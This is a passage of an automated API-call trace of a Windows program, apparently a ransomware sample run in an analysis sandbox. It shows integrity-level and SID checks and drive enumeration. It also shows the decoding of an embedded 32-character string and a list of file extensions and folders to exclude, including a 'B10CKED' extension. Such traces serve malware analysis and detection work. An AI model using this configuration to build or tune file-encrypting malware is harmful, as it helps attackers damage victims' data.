returned 1 [0093.813] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0093.813] EqualSid (pSid1=0x276438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1487b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0093.813] GetLastError () returned 0x7a [0093.813] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2776d8 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2776d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2776d8, ReturnLength=0x12fc64) returned 1 [0093.813] GetSidSubAuthorityCount (pSid=0x2776e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2776e1 [0093.813] GetSidSubAuthority (pSid=0x2776e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2776e8 [0093.813] 
LocalFree (hMem=0x2776d8) returned 0x0 [0093.813] CloseHandle (hObject=0xb8) returned 1 [0093.813] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0093.813] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0093.813] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0093.814] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0093.815] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.815] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0093.815] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0093.815] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0093.815] LockResource (hResData=0x516824) returned 0x516824 [0093.816] FreeResource (hResData=0x516824) returned 0 [0093.816] FindResourceW (hModule=0x400000, lpName="CHAK", 
lpType=0xa) returned 0x51c330 [0093.816] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.816] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.816] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x14cdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.816] FreeResource (hResData=0x50d64c) returned 0 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] GetCurrentThreadId () returned 0xae8 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1460128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0093.816] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1460128, cbMultiByte=615, lpWideCharStr=0x146c65c, cchWideChar=615 | out: 
lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.818] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 